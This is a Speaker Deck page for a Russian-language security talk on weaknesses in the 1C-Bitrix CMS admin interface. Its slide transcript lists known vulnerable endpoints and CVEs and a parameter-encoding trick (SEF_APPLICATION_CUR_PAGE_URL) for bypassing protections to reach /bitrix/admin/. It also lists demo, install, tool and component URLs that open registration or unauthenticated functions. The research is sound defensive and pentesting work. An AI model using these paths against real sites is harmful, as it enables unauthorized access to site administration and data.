Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Выйди и зайди нормально
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Bo0oM
September 13, 2023
Programming
110
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
Выйди и зайди нормально
О некоторых особенностях административного интерфейса CMS 1С-Битрикс
Bo0oM
September 13, 2023
More Decks by Bo0oM
See All by Bo0oM
Носок на сок
bo0om
0
1.9k
Защита от вредоносной автоматизации сегодня
bo0om
0
660
Defending against automatization using nginx
bo0om
0
900
Antibot pitch deck
bo0om
0
190
31337
bo0om
0
240
Your back is white
bo0om
0
400
FTP2RCE
bo0om
1
7.7k
Interpret it!
bo0om
0
1.2k
At Home Among Strangers
bo0om
1
4k
Other Decks in Programming
See All in Programming
Make SRE Operations Easier with Azure SRE Agent
kkamegawa
0
5.5k
AIチームを指揮するOSS「TAKT」活用術 / How to Use “TAKT,” an OSS Tool for Orchestrating AI Teams
nrslib
6
890
エージェンティックRAGにAWSで入門しよう!
har1101
8
1.4k
気圧・高度・GPSを記録&可視化するアプリ「Koudo」を作った話
hjmkth
1
170
dRuby over BLE
makicamel
2
330
Claspは野良GASの夢をみるか
takter00
0
190
不変条件と整合性境界—ビジネスが決める設計判断と実現パターン / Invariants and Consistency Boundaries
nrslib
13
3.7k
RTSPクライアントを自作してみた話
simotin13
0
600
ADKを使って簡単にAIエージェントを作ってみよう
k1mu21
0
260
AI時代の仕事技芸論 — ソフトウェア開発で「遊ぶように働く」職人的熟達のすすめ
kuranuki
2
660
決定論的オーケストレーションの設計と実装 / Design and Implementation of Deterministic Orchestration
nrslib
3
1.3k
TypeScript+Orvalで実現する型安全かつ堅牢でスケーラブルなマルチチャネル通知基盤 / TSKaigi Night talks ~after conference~
d0riven
0
330
Featured
See All Featured
Embracing the Ebb and Flow
colly
88
5.1k
jQuery: Nuts, Bolts and Bling
dougneiner
66
8.5k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
666
130k
How to optimise 3,500 product descriptions for ecommerce in one day using ChatGPT
katarinadahlin
PRO
1
3.6k
Mozcon NYC 2025: Stop Losing SEO Traffic
samtorres
1
250
Building a Modern Day E-commerce SEO Strategy
aleyda
45
9.1k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
31
10k
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
12
1.2k
AI in Enterprises - Java and Open Source to the Rescue
ivargrimstad
0
1.3k
Claude Code のすすめ
schroneko
67
230k
Intergalactic Javascript Robots from Outer Space
tanoku
273
27k
Have SEOs Ruined the Internet? - User Awareness of SEO in 2025
akashhashmi
0
370
Transcript
«Выйди и зайди нормально!» Anton Lopanitsyn
КТО Я? • Тыкаю кавычки (атакую). • Запрещаю тыкать кавычки
(защищаю). • Пытаюсь в стартапы по ИБ (passleak.com, antibot.ru) – но нехватает денюшков • Исследую, развлекаюсь, рассказываю об этом Bo0oM
Как обычно ломают Bitrix? • restore.php Система восстановления файлов в
Bitrix • vote/uf.php CVE-2022-27228 • html_editor_action.php CVE-???, вроде ту же самую дали ей)))0) • уязвимости в самописных модулях не покрытых waf’ом Ну тут как будто без комментариев
Исправления
Исправления
None
Обходим первые защиты
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/ /pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
None
None
None
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
Demo /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c ustom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/ my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs cr_edit.php?register=YES&sf_EMAIL=
Demo
Demo
Install /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/board/my/index.php?register=yes /bitrix/modules/forum/install/admin/forum_index.php
Install
None
Даже если взять и попасть в админку не удалось •
Можно почитать отзывы и обратную связь • Посмотреть списки рассылок • Собрать используемые плагины изнутри • Посмотреть настройки • Побрутить пароли • Собрать дополнительную информацию
Tools /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php
Tools
Tools /bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1
Components /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php
Tools /bitrix/tools/bizproc_get_html_editor.php
/bitrix/modules/subscribe/public/subscr_edit.php
smtp
None
None
Никто не знает, что тут
bo0om
kkamegawa
nrslib
har1101
hjmkth
makicamel
takter00
simotin13
k1mu21
kuranuki
d0riven
colly
dougneiner
pedronauck
katarinadahlin
samtorres
aleyda
eileencodes
tammyeverts
ivargrimstad
schroneko
tanoku
akashhashmi
